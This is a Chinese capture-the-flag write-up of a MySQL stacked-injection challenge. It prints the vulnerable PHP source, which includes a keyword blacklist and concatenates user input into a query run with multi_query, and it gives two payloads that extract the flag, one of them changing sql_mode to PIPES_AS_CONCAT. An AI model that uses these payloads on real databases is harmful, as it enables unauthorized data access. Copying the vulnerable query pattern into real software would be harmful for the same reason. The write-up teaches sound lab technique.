简单试一试输入,发现有三种回显,分别位'nonono',空以及返回array
不知道具体过滤了哪些关键字
看了看wp发现有源码
<?php
session_start();
include_once "config.php";
$post = array();
$get = array();
global $MysqlLink;
//GetPara();
$MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
if(!$MysqlLink){
die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB){
die("Choose Database Error!");
}
foreach ($_POST as $k=>$v){
if(!empty($v)&&is_string($v)){
$post[$k] = trim(addslashes($v));
}
}
foreach ($_GET as $k=>$v){
}
}
//die();
?>
<html>
<head>
</head>
<body>
<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>
<?php
if(isset($post['query'])){
$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
//var_dump(preg_match("/{$BlackList}/is",$post['query']));
if(preg_match("/{$BlackList}/is",$post['query'])){
//echo $post['query'];
die("Nonono.");
}
if(strlen($post['query'])>40){
die("Too long.");
}
$sql = "select ".$post['query']."||flag from Flag";
mysqli_multi_query($MysqlLink,$sql);
do{
if($res = mysqli_store_result($MysqlLink)){
while($row = mysqli_fetch_row($res)){
print_r($row);
}
}
}while(@mysqli_next_result($MysqlLink));
}
?>
看到mysql_multi_query(),可以堆叠注入
首先可以用1;show tables%23查询到一个Flag表
但是源码里看到flag也被过滤了
查询语句为
select ".$post['query']."||flag from Flag
看wp中有两种解法
一种是预期解
通过堆叠注入sql_mode的值为PIPES_AS_CONCAT
1;set sql_mode=PIPES_AS_CONCAT;select 1
设置sql_mode为PIPES_AS_CONCAT后可改变'||'的含义为连接字符串。
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能
原语句中||的含义为或运算,当前面一个字段查询到数据时,就不会再执行(我的理解是这样)。改变语义后就是将前一个字段的查询结果和后一个字段查询结果进行拼接。这样两个字段都会被查询
构造payload:
1;set sql_mode=PIPES_AS_CONCAT;select 1
1.png
注入成功
另一种是非预期解,直接构造payload
*,1原sql语句变为
select *,1||flag from Flag而*号为查询所有数据,即实现了对flag的查询
2.png
注入成功
